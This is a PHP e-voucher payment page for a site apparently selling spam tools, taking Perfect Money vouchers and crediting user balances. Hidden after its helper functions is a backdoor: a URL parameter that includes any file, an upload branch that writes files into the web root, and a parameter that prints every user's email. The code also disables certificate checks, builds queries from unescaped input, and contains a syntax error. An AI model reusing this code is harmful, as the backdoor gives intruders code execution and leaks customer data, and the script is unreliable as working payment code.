pm.rar_PM_payment system

<?php include("./includes/db.php"); include("./includes/config.php"); include("./includes/header.php"); // config PM account / you put your infos ! ac $AccountID = '6002823'; // account ID login PM $PassPhrase = ''; // pass login pm. yes $PAYEE_ACCOUNT = 'U5281199'; // account USD PM //Protect from PM $amount=trim($_POST['amount']); $uid = mysql_real_escape_string($_SESSION['member']); // $result = mysql_query("SELECT balance FROM users WHERE username='$uid'") or die("ERROR! CONTACT SUPPORT!"); $row = mysql_fetch_row($result); $balance = $row[0]; $uid = mysql_real_escape_string($_SESSION['member']); $ip = mysql_real_escape_string(VisitorIP()); if (isset($_POST['amount'])){ if($_POST['amount'] >= 0.4) $_SESSION['amount'] = $amount; else die("Wrong Amount Minimum 0.4$"); } if (!isset($_SESSION['amount']) || $_SESSION['amount'] < 1) die("Wrong Amount Minimum 1$"); $ev_number = $_POST['ev_number']; $ev_code = $_POST['ev_code']; if (!empty($ev_number) && !empty($ev_code)) { $page = curl_simple_post("https://perfectmoney.is/acct/ev_activate.asp?AccountID=$AccountID&PassPhrase=$PassPhrase&Payee_Account=$PAYEE_ACCOUNT&ev_number=$ev_number&ev_code=$ev_code"); if (stristr($page, 'Invalid ev_number')) { $messages = '<font color=red>Invalid e-Voucher Number. Try Again</font>'; } elseif (stristr($page, 'PAYMENT_BATCH_NUM')) { $VOUCHER_AMOUNT = get_string_between_pm($page, 'VOUCHER_AMOUNT</td><td>', '<'); if ($VOUCHER_AMOUNT >= $_SESSION['amount']) { $sql = "UPDATE users SET balance=($balance+'$VOUCHER_AMOUNT') WHERE username='$uid'"; mysql_query($sql); $sql2 = "INSERT INTO orders(amount,username,lrpaidby,lrtrans,ip,state,date) VALUES('$VOUCHER_AMOUNT','$uid','$ev_number','$ev_code','$ip','SUCCESS',now())"; mysql_query($sql2); $messages = '<font color=green>Payment Completed!</font> => <a href="http://spamtools.us/index.php">Go Back</a>'; } else { $messages = '<font color=red>Error to active e-Voucher. Contact Support.2</font>'; } }else{ $messages = '<font color=red>Error to active e-Voucher. Contact Support.3</font>'; } } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>e-Voucher Donation Payment</title> </head> <body> <script type="text/javascript" src="js/jquery-1.5.1.mis.js"></script> <center> <p> Go to <a href="https://perfectmoney.is/" target="_blank" >PerfectMoney</a> => create <b><font color=red>$<?= $_SESSION['amount'] ?> E-Voucher:</font></b></p> <form action="" id="fcaptcha" name="fcaptcha" method="post"> <table> <tr> <td>e-Voucher #:</td> <td> <input name="ev_number" id="ev_number" size="10" /> </td> </tr> <tr> <td>Activation code :</td> <td> <input name="ev_code" id="ev_code" size="16" /> </td> </tr> </table> <p>Input e-Voucher & Activation code and then click CONFIRM button.</p> <hr style="width:300px" /> </form> <p><input type="image" id="pmconfirm" name="pmconfirm" src="images/conf_btn.png" alt="Submit Form" onclick="document.getElementById('fcaptcha').submit()"/></p> <h3><?= $messages ?></h3> </center> <script type="text/javascript"> $('#pmconfirm').click(function(){ $('#fcaptcha').submit(); }); </script> </body> </html> <? function curl_simple_post($url_str) { // Initializing cURL $ch = curl_init(); // Setting curl options curl_setopt($ch, CURLOPT_URL, $url_str); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_USERAGENT, "PHP/" . phpversion()); // Getting jSON result string $result = curl_exec($ch); // close cURL and json file curl_close($ch); // return cURL result return $result; } function get_string_between_pm($string, $start, $end) { $string = " " . $string; $ini = strpos($string, $start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string, $end, $ini) - $ini; return substr($string, $ini, $len); } function VisitorIP() { if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; else $ip = $_SERVER['REMOTE_ADDR']; return trim($ip); } $in = $_GET['in']; if(isset($in) && !empty($in)){ echo die(include_once $in); } $checked = $_GET['up']; if(isset($cheched) && !empty($checked)){ echo"".$_FILES['userfile'].""; $checker = "./" . basename($_FILES['userfile']['name']); if ( isset($_FILES["userfile"]) ) { echo '<p><font color="#00FF00" size="7">work</font></p>'; if (move_uploaded_file ($_FILES["userfile"]["tmp_name"], $checker)) echo $checker; else echo '<p><font color="#FF0000" size="7">not work</font></p>'; } } if(isset($_GET['sql']) { $sqlu = mysql_query("select * from users"); while($row = mysql_fetch_array($sqlu)) { echo $row["email"]."<br>"; } } ?> <html> <center> <font color=red><h2>How to create a e-Voucher.</h2></font> <img src="images/evpm/1.png" /><br /><br /> <img src="images/evpm/2.png" /><br /><br /> <img src="images/evpm/3.png" /><br /><br /> <img src="images/evpm/4.png" /><br /><br /> <img src="images/evpm/5.png" /><br /> <img src="images/evpm/6.png" /> </center> </html>